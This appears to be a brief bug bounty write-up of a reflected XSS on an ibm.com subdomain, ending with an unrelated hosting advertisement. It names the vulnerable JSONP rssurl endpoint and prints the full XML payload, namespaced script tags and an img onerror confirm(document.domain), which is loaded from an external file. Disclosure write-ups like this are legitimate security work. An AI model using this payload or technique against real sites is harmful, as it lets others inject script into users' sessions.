Reflected XSS by jsonp on ibm.com subdomain

#security #jsonp #xss #bugbounty

hi :D
this my write up about my bug I've found on ibm.com, first I get URLs from web.archive.org on ibm.com by using waybackurls tool and I got this URL https://www-356.ibm.com/partnerworld/wps/servlet/pwdyn/pw/rss/rsstojson.jsp?ccdb=no&rssurl=https://www-2000.ibm.com/file.xml&_=1596170198353
this endpoint include XML file via rssurl parameter and covert the content from XML to jsonp

but in headers, content-type: text/html, this allowed to execute HTML tags in this page , so I've created an XML file with XSS payload and upload it on my website https://knassar702.github.io/xss.xml
and add the link of the file in rssurl parameter

<html>
        <head></head>
        <body>
                <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
                <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script>
                <info>
                  <name>
                    <value><![CDATA[<img src=x onerror=confirm(document.domain)>]]></value>
                  </name>
                    <description>
                      <value>Hello</value>
                    </description>
                    <url>
                      <value>http://google.com</value>
                    </url>
                </info>
        </body>
</html>

Done :D

Get n8n VPS hosting 3x cheaper than a cloud solution

Get fast, easy, secure n8n VPS hosting from $4.99/mo at Hostinger. Automate any workflow using a pre-installed n8n application and no-code customization.

Start now